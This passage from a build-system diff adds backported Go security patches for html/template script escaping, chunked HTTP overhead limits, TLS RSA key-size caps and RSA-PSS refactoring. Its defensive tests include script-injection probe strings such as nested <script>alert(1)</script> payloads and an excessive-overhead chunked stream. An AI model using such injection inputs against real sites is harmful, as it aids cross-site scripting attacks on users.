++ expectedErr := "tls: server sent certificate containing RSA key larger than 8192 bits"
++ err := c.verifyServerCertificate([][]byte{testCert.Bytes})
++ if err == nil || err.Error() != expectedErr {
++ t.Errorf("Conn.verifyServerCertificate unexpected error: want %q, got %q", expectedErr, err)
++ }
++
++ expectedErr = "tls: client sent certificate containing RSA key larger than 8192 bits"
++ err = c.processCertsFromClient(Certificate{Certificate: [][]byte{testCert.Bytes}})
++ if err == nil || err.Error() != expectedErr {
++ t.Errorf("Conn.processCertsFromClient unexpected error: want %q, got %q", expectedErr, err)
++ }
++}
+diff --git a/src/crypto/tls/handshake_server.go b/src/crypto/tls/handshake_server.go
+index b16415a..2e36840 100644
+--- a/src/crypto/tls/handshake_server.go
++++ b/src/crypto/tls/handshake_server.go
+@@ -738,6 +738,10 @@ func (c *Conn) processCertsFromClient(certificate Certificate) error {
+ c.sendAlert(alertBadCertificate)
+ return errors.New("tls: failed to parse client certificate: " + err.Error())
+ }
++ if certs[i].PublicKeyAlgorithm == x509.RSA && certs[i].PublicKey.(*rsa.PublicKey).N.BitLen() > maxRSAKeySize {
++ c.sendAlert(alertBadCertificate)
++ return fmt.Errorf("tls: client sent certificate containing RSA key larger than %d bits", maxRSAKeySize)
++ }
+ }
+
+ if len(certs) == 0 && requiresClientCert(c.config.ClientAuth) {
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-39318.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-39318.patch
new file mode 100644
index 0000000000..00def8fcda
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-39318.patch
@@ -0,0 +1,262 @@
+From 023b542edf38e2a1f87fcefb9f75ff2f99401b4c Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Thu, 3 Aug 2023 12:24:13 -0700
+Subject: [PATCH] [release-branch.go1.20] html/template: support HTML-like
+ comments in script contexts
+
+Per Appendix B.1.1 of the ECMAScript specification, support HTML-like
+comments in script contexts. Also per section 12.5, support hashbang
+comments. This brings our parsing in-line with how browsers treat these
+comment types.
+
+Thanks to Takeshi Kaneko (GMO Cybersecurity by Ierae, Inc.) for
+reporting this issue.
+
+Fixes #62196
+Fixes #62395
+Fixes CVE-2023-39318
+
+Change-Id: Id512702c5de3ae46cf648e268cb10e1eb392a181
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1976593
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2014620
+Reviewed-on: https://go-review.googlesource.com/c/go/+/526098
+Run-TryBot: Cherry Mui <cherryyz@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+
+Upstream-Status: Backport from [https://github.com/golang/go/commit/023b542edf38e2a1f87fcefb9f75ff2f99401b4c]
+CVE: CVE-2023-39318
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ src/html/template/context.go | 6 ++-
+ src/html/template/escape.go | 5 +-
+ src/html/template/escape_test.go | 10 ++++
+ src/html/template/state_string.go | 26 +++++-----
+ src/html/template/transition.go | 80 ++++++++++++++++++++-----------
+ 5 files changed, 84 insertions(+), 43 deletions(-)
+
+diff --git a/src/html/template/context.go b/src/html/template/context.go
+index 0b65313..4eb7891 100644
+--- a/src/html/template/context.go
++++ b/src/html/template/context.go
+@@ -124,6 +124,10 @@ const (
+ stateJSBlockCmt
+ // stateJSLineCmt occurs inside a JavaScript // line comment.
+ stateJSLineCmt
++ // stateJSHTMLOpenCmt occurs inside a JavaScript <!-- HTML-like comment.
++ stateJSHTMLOpenCmt
++ // stateJSHTMLCloseCmt occurs inside a JavaScript --> HTML-like comment.
++ stateJSHTMLCloseCmt
+ // stateCSS occurs inside a <style> element or style attribute.
+ stateCSS
+ // stateCSSDqStr occurs inside a CSS double quoted string.
+@@ -149,7 +153,7 @@ const (
+ // authors & maintainers, not for end-users or machines.
+ func isComment(s state) bool {
+ switch s {
+- case stateHTMLCmt, stateJSBlockCmt, stateJSLineCmt, stateCSSBlockCmt, stateCSSLineCmt:
++ case stateHTMLCmt, stateJSBlockCmt, stateJSLineCmt, stateJSHTMLOpenCmt, stateJSHTMLCloseCmt, stateCSSBlockCmt, stateCSSLineCmt:
+ return true
+ }
+ return false
+diff --git a/src/html/template/escape.go b/src/html/template/escape.go
+index 435f912..ad2ec69 100644
+--- a/src/html/template/escape.go
++++ b/src/html/template/escape.go
+@@ -698,9 +698,12 @@ func (e *escaper) escapeText(c context, n *parse.TextNode) context {
+ if c.state != c1.state && isComment(c1.state) && c1.delim == delimNone {
+ // Preserve the portion between written and the comment start.
+ cs := i1 - 2
+- if c1.state == stateHTMLCmt {
++ if c1.state == stateHTMLCmt || c1.state == stateJSHTMLOpenCmt {
+ // "<!--" instead of "/*" or "//"
+ cs -= 2
++ } else if c1.state == stateJSHTMLCloseCmt {
++ // "-->" instead of "/*" or "//"
++ cs -= 1
+ }
+ b.Write(s[written:cs])
+ written = i1
+diff --git a/src/html/template/escape_test.go b/src/html/template/escape_test.go
+index f550691..5f41e52 100644
+--- a/src/html/template/escape_test.go
++++ b/src/html/template/escape_test.go
+@@ -503,6 +503,16 @@ func TestEscape(t *testing.T) {
+ "<script>var a/*b*///c\nd</script>",
+ "<script>var a \nd</script>",
+ },
++ {
++ "JS HTML-like comments",
++ "<script>before <!-- beep\nbetween\nbefore-->boop\n</script>",
++ "<script>before \nbetween\nbefore\n</script>",
++ },
++ {
++ "JS hashbang comment",
++ "<script>#! beep\n</script>",
++ "<script>\n</script>",
++ },
+ {
+ "CSS comments",
+ "<style>p// paragraph\n" +
+diff --git a/src/html/template/state_string.go b/src/html/template/state_string.go
+index 05104be..b5cfe70 100644
+--- a/src/html/template/state_string.go
++++ b/src/html/template/state_string.go
+@@ -25,21 +25,23 @@ func _() {
+ _ = x[stateJSRegexp-14]
+ _ = x[stateJSBlockCmt-15]
+ _ = x[stateJSLineCmt-16]
+- _ = x[stateCSS-17]
+- _ = x[stateCSSDqStr-18]
+- _ = x[stateCSSSqStr-19]
+- _ = x[stateCSSDqURL-20]
+- _ = x[stateCSSSqURL-21]
+- _ = x[stateCSSURL-22]
+- _ = x[stateCSSBlockCmt-23]
+- _ = x[stateCSSLineCmt-24]
+- _ = x[stateError-25]
+- _ = x[stateDead-26]
++ _ = x[stateJSHTMLOpenCmt-17]
++ _ = x[stateJSHTMLCloseCmt-18]
++ _ = x[stateCSS-19]
++ _ = x[stateCSSDqStr-20]
++ _ = x[stateCSSSqStr-21]
++ _ = x[stateCSSDqURL-22]
++ _ = x[stateCSSSqURL-23]
++ _ = x[stateCSSURL-24]
++ _ = x[stateCSSBlockCmt-25]
++ _ = x[stateCSSLineCmt-26]
++ _ = x[stateError-27]
++ _ = x[stateDead-28]
+ }
+
+-const _state_name = "stateTextstateTagstateAttrNamestateAfterNamestateBeforeValuestateHTMLCmtstateRCDATAstateAttrstateURLstateSrcsetstateJSstateJSDqStrstateJSSqStrstateJSBqStrstateJSRegexpstateJSBlockCmtstateJSLineCmtstateCSSstateCSSDqStrstateCSSSqStrstateCSSDqURLstateCSSSqURLstateCSSURLstateCSSBlockCmtstateCSSLineCmtstateErrorstateDead"
++const _state_name = "stateTextstateTagstateAttrNamestateAfterNamestateBeforeValuestateHTMLCmtstateRCDATAstateAttrstateURLstateSrcsetstateJSstateJSDqStrstateJSSqStrstateJSBqStrstateJSRegexpstateJSBlockCmtstateJSLineCmtstateJSHTMLOpenCmtstateJSHTMLCloseCmtstateCSSstateCSSDqStrstateCSSSqStrstateCSSDqURLstateCSSSqURLstateCSSURLstateCSSBlockCmtstateCSSLineCmtstateErrorstateDead"
+
+-var _state_index = [...]uint16{0, 9, 17, 30, 44, 60, 72, 83, 92, 100, 111, 118, 130, 142, 154, 167, 182, 196, 204, 217, 230, 243, 256, 267, 283, 298, 308, 317}
++var _state_index = [...]uint16{0, 9, 17, 30, 44, 60, 72, 83, 92, 100, 111, 118, 130, 142, 154, 167, 182, 196, 214, 233, 241, 254, 267, 280, 293, 304, 320, 335, 345, 354}
+
+ func (i state) String() string {
+ if i >= state(len(_state_index)-1) {
+diff --git a/src/html/template/transition.go b/src/html/template/transition.go
+index 92eb351..12aa4c4 100644
+--- a/src/html/template/transition.go
++++ b/src/html/template/transition.go
+@@ -14,32 +14,34 @@ import (
+ // the updated context and the number of bytes consumed from the front of the
+ // input.
+ var transitionFunc = [...]func(context, []byte) (context, int){
+- stateText: tText,
+- stateTag: tTag,
+- stateAttrName: tAttrName,
+- stateAfterName: tAfterName,
+- stateBeforeValue: tBeforeValue,
+- stateHTMLCmt: tHTMLCmt,
+- stateRCDATA: tSpecialTagEnd,
+- stateAttr: tAttr,
+- stateURL: tURL,
+- stateSrcset: tURL,
+- stateJS: tJS,
+- stateJSDqStr: tJSDelimited,
+- stateJSSqStr: tJSDelimited,
+- stateJSBqStr: tJSDelimited,
+- stateJSRegexp: tJSDelimited,
+- stateJSBlockCmt: tBlockCmt,
+- stateJSLineCmt: tLineCmt,
+- stateCSS: tCSS,
+- stateCSSDqStr: tCSSStr,
+- stateCSSSqStr: tCSSStr,
+- stateCSSDqURL: tCSSStr,
+- stateCSSSqURL: tCSSStr,
+- stateCSSURL: tCSSStr,
+- stateCSSBlockCmt: tBlockCmt,
+- stateCSSLineCmt: tLineCmt,
+- stateError: tError,
++ stateText: tText,
++ stateTag: tTag,
++ stateAttrName: tAttrName,
++ stateAfterName: tAfterName,
++ stateBeforeValue: tBeforeValue,
++ stateHTMLCmt: tHTMLCmt,
++ stateRCDATA: tSpecialTagEnd,
++ stateAttr: tAttr,
++ stateURL: tURL,
++ stateSrcset: tURL,
++ stateJS: tJS,
++ stateJSDqStr: tJSDelimited,
++ stateJSSqStr: tJSDelimited,
++ stateJSBqStr: tJSDelimited,
++ stateJSRegexp: tJSDelimited,
++ stateJSBlockCmt: tBlockCmt,
++ stateJSLineCmt: tLineCmt,
++ stateJSHTMLOpenCmt: tLineCmt,
++ stateJSHTMLCloseCmt: tLineCmt,
++ stateCSS: tCSS,
++ stateCSSDqStr: tCSSStr,
++ stateCSSSqStr: tCSSStr,
++ stateCSSDqURL: tCSSStr,
++ stateCSSSqURL: tCSSStr,
++ stateCSSURL: tCSSStr,
++ stateCSSBlockCmt: tBlockCmt,
++ stateCSSLineCmt: tLineCmt,
++ stateError: tError,
+ }
+
+ var commentStart = []byte("<!--")
+@@ -263,7 +265,7 @@ func tURL(c context, s []byte) (context, int) {
+
+ // tJS is the context transition function for the JS state.
+ func tJS(c context, s []byte) (context, int) {
+- i := bytes.IndexAny(s, "\"`'/")
++ i := bytes.IndexAny(s, "\"`'/<-#")
+ if i == -1 {
+ // Entire input is non string, comment, regexp tokens.
+ c.jsCtx = nextJSCtx(s, c.jsCtx)
+@@ -293,6 +295,26 @@ func tJS(c context, s []byte) (context, int) {
+ err: errorf(ErrSlashAmbig, nil, 0, "'/' could start a division or regexp: %.32q", s[i:]),
+ }, len(s)
+ }
++ // ECMAScript supports HTML style comments for legacy reasons, see Appendix
++ // B.1.1 "HTML-like Comments". The handling of these comments is somewhat
++ // confusing. Multi-line comments are not supported, i.e. anything on lines
++ // between the opening and closing tokens is not considered a comment, but
++ // anything following the opening or closing token, on the same line, is
++ // ignored. As such we simply treat any line prefixed with "<!--" or "-->"
++ // as if it were actually prefixed with "//" and move on.
++ case '<':
++ if i+3 < len(s) && bytes.Equal(commentStart, s[i:i+4]) {
++ c.state, i = stateJSHTMLOpenCmt, i+3
++ }
++ case '-':
++ if i+2 < len(s) && bytes.Equal(commentEnd, s[i:i+3]) {
++ c.state, i = stateJSHTMLCloseCmt, i+2
++ }
++ // ECMAScript also supports "hashbang" comment lines, see Section 12.5.
++ case '#':
++ if i+1 < len(s) && s[i+1] == '!' {
++ c.state, i = stateJSLineCmt, i+1
++ }
+ default:
+ panic("unreachable")
+ }
+@@ -372,12 +394,12 @@ func tBlockCmt(c context, s []byte) (context, int) {
+ return c, i + 2
+ }
+
+-// tLineCmt is the context transition function for //comment states.
++// tLineCmt is the context transition function for //comment states, and the JS HTML-like comment state.
+ func tLineCmt(c context, s []byte) (context, int) {
+ var lineTerminators string
+ var endState state
+ switch c.state {
+- case stateJSLineCmt:
++ case stateJSLineCmt, stateJSHTMLOpenCmt, stateJSHTMLCloseCmt:
+ lineTerminators, endState = "\n\r\u2028\u2029", stateJS
+ case stateCSSLineCmt:
+ lineTerminators, endState = "\n\f\r", stateCSS
+--
+2.24.4
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-39319.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-39319.patch
new file mode 100644
index 0000000000..69106e3e05
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-39319.patch
@@ -0,0 +1,230 @@
+From 2070531d2f53df88e312edace6c8dfc9686ab2f5 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Thu, 3 Aug 2023 12:28:28 -0700
+Subject: [PATCH] [release-branch.go1.20] html/template: properly handle
+ special tags within the script context
+
+The HTML specification has incredibly complex rules for how to handle
+"<!--", "<script", and "</script" when they appear within literals in
+the script context. Rather than attempting to apply these restrictions
+(which require a significantly more complex state machine) we apply
+the workaround suggested in section 4.12.1.3 of the HTML specification [1].
+
+More precisely, when "<!--", "<script", and "</script" appear within
+literals (strings and regular expressions, ignoring comments since we
+already elide their content) we replace the "<" with "\x3C". This avoids
+the unintuitive behavior that using these tags within literals can cause,
+by simply preventing the rendered content from triggering it. This may
+break some correct usages of these tags, but on balance is more likely
+to prevent XSS attacks where users are unknowingly either closing or not
+closing the script blocks where they think they are.
+
+Thanks to Takeshi Kaneko (GMO Cybersecurity by Ierae, Inc.) for
+reporting this issue.
+
+Fixes #62197
+Fixes #62397
+Fixes CVE-2023-39319
+
+[1] https://html.spec.whatwg.org/#restrictions-for-contents-of-script-elements
+
+Change-Id: Iab57b0532694827e3eddf57a7497ba1fab1746dc
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1976594
+Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2014621
+TryBot-Result: Security TryBots <security-trybots@go-security-trybots.iam.gserviceaccount.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/526099
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Run-TryBot: Cherry Mui <cherryyz@google.com>
+
+Upstream-Status: Backport from [https://github.com/golang/go/commit/2070531d2f53df88e312edace6c8dfc9686ab2f5]
+CVE: CVE-2023-39319
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ src/html/template/context.go | 14 ++++++++++
+ src/html/template/escape.go | 26 ++++++++++++++++++
+ src/html/template/escape_test.go | 47 +++++++++++++++++++++++++++++++-
+ src/html/template/transition.go | 15 ++++++++++
+ 4 files changed, 101 insertions(+), 1 deletion(-)
+
+diff --git a/src/html/template/context.go b/src/html/template/context.go
+index 4eb7891..feb6517 100644
+--- a/src/html/template/context.go
++++ b/src/html/template/context.go
+@@ -168,6 +168,20 @@ func isInTag(s state) bool {
+ return false
+ }
+
++// isInScriptLiteral returns true if s is one of the literal states within a
++// <script> tag, and as such occurances of "<!--", "<script", and "</script"
++// need to be treated specially.
++func isInScriptLiteral(s state) bool {
++ // Ignore the comment states (stateJSBlockCmt, stateJSLineCmt,
++ // stateJSHTMLOpenCmt, stateJSHTMLCloseCmt) because their content is already
++ // omitted from the output.
++ switch s {
++ case stateJSDqStr, stateJSSqStr, stateJSBqStr, stateJSRegexp:
++ return true
++ }
++ return false
++}
++
+ // delim is the delimiter that will end the current HTML attribute.
+ type delim uint8
+
+diff --git a/src/html/template/escape.go b/src/html/template/escape.go
+index ad2ec69..de8cf6f 100644
+--- a/src/html/template/escape.go
++++ b/src/html/template/escape.go
+@@ -10,6 +10,7 @@ import (
+ "html"
+ "internal/godebug"
+ "io"
++ "regexp"
+ "text/template"
+ "text/template/parse"
+ )
+@@ -650,6 +651,26 @@ var delimEnds = [...]string{
+ delimSpaceOrTagEnd: " \t\n\f\r>",
+ }
+
++var (
++ // Per WHATWG HTML specification, section 4.12.1.3, there are extremely
++ // complicated rules for how to handle the set of opening tags <!--,
++ // <script, and </script when they appear in JS literals (i.e. strings,
++ // regexs, and comments). The specification suggests a simple solution,
++ // rather than implementing the arcane ABNF, which involves simply escaping
++ // the opening bracket with \x3C. We use the below regex for this, since it
++ // makes doing the case-insensitive find-replace much simpler.
++ specialScriptTagRE = regexp.MustCompile("(?i)<(script|/script|!--)")
++ specialScriptTagReplacement = []byte("\\x3C$1")
++)
++
++func containsSpecialScriptTag(s []byte) bool {
++ return specialScriptTagRE.Match(s)
++}
++
++func escapeSpecialScriptTags(s []byte) []byte {
++ return specialScriptTagRE.ReplaceAll(s, specialScriptTagReplacement)
++}
++
+ var doctypeBytes = []byte("<!DOCTYPE")
+
+ // escapeText escapes a text template node.
+@@ -708,6 +729,11 @@ func (e *escaper) escapeText(c context, n *parse.TextNode) context {
+ b.Write(s[written:cs])
+ written = i1
+ }
++ if isInScriptLiteral(c.state) && containsSpecialScriptTag(s[i:i1]) {
++ b.Write(s[written:i])
++ b.Write(escapeSpecialScriptTags(s[i:i1]))
++ written = i1
++ }
+ if i == i1 && c.state == c1.state {
+ panic(fmt.Sprintf("infinite loop from %v to %v on %q..%q", c, c1, s[:i], s[i:]))
+ }
+diff --git a/src/html/template/escape_test.go b/src/html/template/escape_test.go
+index 5f41e52..0cacb20 100644
+--- a/src/html/template/escape_test.go
++++ b/src/html/template/escape_test.go
+@@ -513,6 +513,21 @@ func TestEscape(t *testing.T) {
+ "<script>#! beep\n</script>",
+ "<script>\n</script>",
+ },
++ {
++ "Special tags in <script> string literals",
++ `<script>var a = "asd < 123 <!-- 456 < fgh <script jkl < 789 </script"</script>`,
++ `<script>var a = "asd < 123 \x3C!-- 456 < fgh \x3Cscript jkl < 789 \x3C/script"</script>`,
++ },
++ {
++ "Special tags in <script> string literals (mixed case)",
++ `<script>var a = "<!-- <ScripT </ScripT"</script>`,
++ `<script>var a = "\x3C!-- \x3CScripT \x3C/ScripT"</script>`,
++ },
++ {
++ "Special tags in <script> regex literals (mixed case)",
++ `<script>var a = /<!-- <ScripT </ScripT/</script>`,
++ `<script>var a = /\x3C!-- \x3CScripT \x3C/ScripT/</script>`,
++ },
+ {
+ "CSS comments",
+ "<style>p// paragraph\n" +
+@@ -1501,8 +1516,38 @@ func TestEscapeText(t *testing.T) {
+ context{state: stateJS, element: elementScript},
+ },
+ {
++ // <script and </script tags are escaped, so </script> should not
++ // cause us to exit the JS state.
+ `<script>document.write("<script>alert(1)</script>");`,
+- context{state: stateText},
++ context{state: stateJS, element: elementScript},
++ },
++ {
++ `<script>document.write("<script>`,
++ context{state: stateJSDqStr, element: elementScript},
++ },
++ {
++ `<script>document.write("<script>alert(1)</script>`,
++ context{state: stateJSDqStr, element: elementScript},
++ },
++ {
++ `<script>document.write("<script>alert(1)<!--`,
++ context{state: stateJSDqStr, element: elementScript},
++ },
++ {
++ `<script>document.write("<script>alert(1)</Script>");`,
++ context{state: stateJS, element: elementScript},
++ },
++ {
++ `<script>document.write("<!--");`,
++ context{state: stateJS, element: elementScript},
++ },
++ {
++ `<script>let a = /</script`,
++ context{state: stateJSRegexp, element: elementScript},
++ },
++ {
++ `<script>let a = /</script/`,
++ context{state: stateJS, element: elementScript, jsCtx: jsCtxDivOp},
+ },
+ {
+ `<script type="text/template">`,
+diff --git a/src/html/template/transition.go b/src/html/template/transition.go
+index 12aa4c4..3d2a37c 100644
+--- a/src/html/template/transition.go
++++ b/src/html/template/transition.go
+@@ -214,6 +214,11 @@ var (
+ // element states.
+ func tSpecialTagEnd(c context, s []byte) (context, int) {
+ if c.element != elementNone {
++ // script end tags ("</script") within script literals are ignored, so that
++ // we can properly escape them.
++ if c.element == elementScript && (isInScriptLiteral(c.state) || isComment(c.state)) {
++ return c, len(s)
++ }
+ if i := indexTagEnd(s, specialTagEndMarkers[c.element]); i != -1 {
+ return context{}, i
+ }
+@@ -353,6 +358,16 @@ func tJSDelimited(c context, s []byte) (context, int) {
+ inCharset = true
+ case ']':
+ inCharset = false
++ case '/':
++ // If "</script" appears in a regex literal, the '/' should not
++ // close the regex literal, and it will later be escaped to
++ // "\x3C/script" in escapeText.
++ if i > 0 && i+7 <= len(s) && bytes.Compare(bytes.ToLower(s[i-1:i+7]), []byte("</script")) == 0 {
++ i++
++ } else if !inCharset {
++ c.state, c.jsCtx = stateJS, jsCtxDivOp
++ return c, i + 1
++ }
+ default:
+ // end delimiter
+ if !inCharset {
+--
+2.24.4
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-39326.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-39326.patch
new file mode 100644
index 0000000000..998af361e8
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-39326.patch
@@ -0,0 +1,181 @@
+From 6446af942e2e2b161c4ec1b60d9703a2b55dc4dd Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Tue, 7 Nov 2023 10:47:56 -0800
+Subject: [PATCH] [release-branch.go1.20] net/http: limit chunked data overhead
+
+The chunked transfer encoding adds some overhead to
+the content transferred. When writing one byte per
+chunk, for example, there are five bytes of overhead
+per byte of data transferred: "1\r\nX\r\n" to send "X".
+
+Chunks may include "chunk extensions",
+which we skip over and do not use.
+For example: "1;chunk extension here\r\nX\r\n".
+
+A malicious sender can use chunk extensions to add
+about 4k of overhead per byte of data.
+(The maximum chunk header line size we will accept.)
+
+Track the amount of overhead read in chunked data,
+and produce an error if it seems excessive.
+
+Updates #64433
+Fixes #64434
+Fixes CVE-2023-39326
+
+Change-Id: I40f8d70eb6f9575fb43f506eb19132ccedafcf39
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2076135
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+(cherry picked from commit 3473ae72ee66c60744665a24b2fde143e8964d4f)
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2095407
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+TryBot-Result: Security TryBots <security-trybots@go-security-trybots.iam.gserviceaccount.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/547355
+Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
+LUCI-TryBot-Result: Go LUCI <golang-scoped@luci-project-accounts.iam.gserviceaccount.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/6446af942e2e2b161c4ec1b60d9703a2b55dc4dd]
+CVE: CVE-2023-39326
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/net/http/internal/chunked.go | 36 +++++++++++++---
+ src/net/http/internal/chunked_test.go | 59 +++++++++++++++++++++++++++
+ 2 files changed, 89 insertions(+), 6 deletions(-)
+
+diff --git a/src/net/http/internal/chunked.go b/src/net/http/internal/chunked.go
+index f06e572..ddbaacb 100644
+--- a/src/net/http/internal/chunked.go
++++ b/src/net/http/internal/chunked.go
+@@ -39,7 +39,8 @@ type chunkedReader struct {
+ n uint64 // unread bytes in chunk
+ err error
+ buf [2]byte
+- checkEnd bool // whether need to check for \r\n chunk footer
++ checkEnd bool // whether need to check for \r\n chunk footer
++ excess int64 // "excessive" chunk overhead, for malicious sender detection
+ }
+
+ func (cr *chunkedReader) beginChunk() {
+@@ -49,10 +50,38 @@ func (cr *chunkedReader) beginChunk() {
+ if cr.err != nil {
+ return
+ }
++ cr.excess += int64(len(line)) + 2 // header, plus \r\n after the chunk data
++ line = trimTrailingWhitespace(line)
++ line, cr.err = removeChunkExtension(line)
++ if cr.err != nil {
++ return
++ }
+ cr.n, cr.err = parseHexUint(line)
+ if cr.err != nil {
+ return
+ }
++ // A sender who sends one byte per chunk will send 5 bytes of overhead
++ // for every byte of data. ("1\r\nX\r\n" to send "X".)
++ // We want to allow this, since streaming a byte at a time can be legitimate.
++ //
++ // A sender can use chunk extensions to add arbitrary amounts of additional
++ // data per byte read. ("1;very long extension\r\nX\r\n" to send "X".)
++ // We don't want to disallow extensions (although we discard them),
++ // but we also don't want to allow a sender to reduce the signal/noise ratio
++ // arbitrarily.
++ //
++ // We track the amount of excess overhead read,
++ // and produce an error if it grows too large.
++ //
++ // Currently, we say that we're willing to accept 16 bytes of overhead per chunk,
++ // plus twice the amount of real data in the chunk.
++ cr.excess -= 16 + (2 * int64(cr.n))
++ if cr.excess < 0 {
++ cr.excess = 0
++ }
++ if cr.excess > 16*1024 {
++ cr.err = errors.New("chunked encoding contains too much non-data")
++ }
+ if cr.n == 0 {
+ cr.err = io.EOF
+ }
+@@ -133,11 +162,6 @@ func readChunkLine(b *bufio.Reader) ([]byte, error) {
+ if len(p) >= maxLineLength {
+ return nil, ErrLineTooLong
+ }
+- p = trimTrailingWhitespace(p)
+- p, err = removeChunkExtension(p)
+- if err != nil {
+- return nil, err
+- }
+ return p, nil
+ }
+
+diff --git a/src/net/http/internal/chunked_test.go b/src/net/http/internal/chunked_test.go
+index d067165..b20747d 100644
+--- a/src/net/http/internal/chunked_test.go
++++ b/src/net/http/internal/chunked_test.go
+@@ -212,3 +212,62 @@ func TestChunkReadPartial(t *testing.T) {
+ }
+
+ }
++
++func TestChunkReaderTooMuchOverhead(t *testing.T) {
++ // If the sender is sending 100x as many chunk header bytes as chunk data,
++ // we should reject the stream at some point.
++ chunk := []byte("1;")
++ for i := 0; i < 100; i++ {
++ chunk = append(chunk, 'a') // chunk extension
++ }
++ chunk = append(chunk, "\r\nX\r\n"...)
++ const bodylen = 1 << 20
++ r := NewChunkedReader(&funcReader{f: func(i int) ([]byte, error) {
++ if i < bodylen {
++ return chunk, nil
++ }
++ return []byte("0\r\n"), nil
++ }})
++ _, err := io.ReadAll(r)
++ if err == nil {
++ t.Fatalf("successfully read body with excessive overhead; want error")
++ }
++}
++
++func TestChunkReaderByteAtATime(t *testing.T) {
++ // Sending one byte per chunk should not trip the excess-overhead detection.
++ const bodylen = 1 << 20
++ r := NewChunkedReader(&funcReader{f: func(i int) ([]byte, error) {
++ if i < bodylen {
++ return []byte("1\r\nX\r\n"), nil
++ }
++ return []byte("0\r\n"), nil
++ }})
++ got, err := io.ReadAll(r)
++ if err != nil {
++ t.Errorf("unexpected error: %v", err)
++ }
++ if len(got) != bodylen {
++ t.Errorf("read %v bytes, want %v", len(got), bodylen)
++ }
++}
++
++type funcReader struct {
++ f func(iteration int) ([]byte, error)
++ i int
++ b []byte
++ err error
++}
++
++func (r *funcReader) Read(p []byte) (n int, err error) {
++ if len(r.b) == 0 && r.err == nil {
++ r.b, r.err = r.f(r.i)
++ r.i++
++ }
++ n = copy(p, r.b)
++ r.b = r.b[n:]
++ if len(r.b) > 0 {
++ return n, nil
++ }
++ return n, r.err
++}
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre1.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre1.patch
new file mode 100644
index 0000000000..4d65180253
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre1.patch
@@ -0,0 +1,393 @@
+From 9baafabac9a84813a336f068862207d2bb06d255 Mon Sep 17 00:00:00 2001
+From: Filippo Valsorda <filippo@golang.org>
+Date: Wed, 1 Apr 2020 17:25:40 -0400
+Subject: [PATCH] crypto/rsa: refactor RSA-PSS signing and verification
+
+Cleaned up for readability and consistency.
+
+There is one tiny behavioral change: when PSSSaltLengthEqualsHash is
+used and both hash and opts.Hash were set, hash.Size() was used for the
+salt length instead of opts.Hash.Size(). That's clearly wrong because
+opts.Hash is documented to override hash.
+
+Change-Id: I3e25dad933961eac827c6d2e3bbfe45fc5a6fb0e
+Reviewed-on: https://go-review.googlesource.com/c/go/+/226937
+Run-TryBot: Filippo Valsorda <filippo@golang.org>
+TryBot-Result: Gobot Gobot <gobot@golang.org>
+Reviewed-by: Katie Hockman <katie@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/9baafabac9a84813a336f068862207d2bb06d255]
+CVE: CVE-2023-45287 #Dependency Patch1
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/crypto/rsa/pss.go | 173 ++++++++++++++++++++++--------------------
+ src/crypto/rsa/rsa.go | 9 ++-
+ 2 files changed, 96 insertions(+), 86 deletions(-)
+
+diff --git a/src/crypto/rsa/pss.go b/src/crypto/rsa/pss.go
+index 3ff0c2f4d0076..f9844d87329a8 100644
+--- a/src/crypto/rsa/pss.go
++++ b/src/crypto/rsa/pss.go
+@@ -4,9 +4,7 @@
+
+ package rsa
+
+-// This file implements the PSS signature scheme [1].
+-//
+-// [1] https://www.emc.com/collateral/white-papers/h11300-pkcs-1v2-2-rsa-cryptography-standard-wp.pdf
++// This file implements the RSASSA-PSS signature scheme according to RFC 8017.
+
+ import (
+ "bytes"
+@@ -17,8 +15,22 @@ import (
+ "math/big"
+ )
+
++// Per RFC 8017, Section 9.1
++//
++// EM = MGF1 xor DB || H( 8*0x00 || mHash || salt ) || 0xbc
++//
++// where
++//
++// DB = PS || 0x01 || salt
++//
++// and PS can be empty so
++//
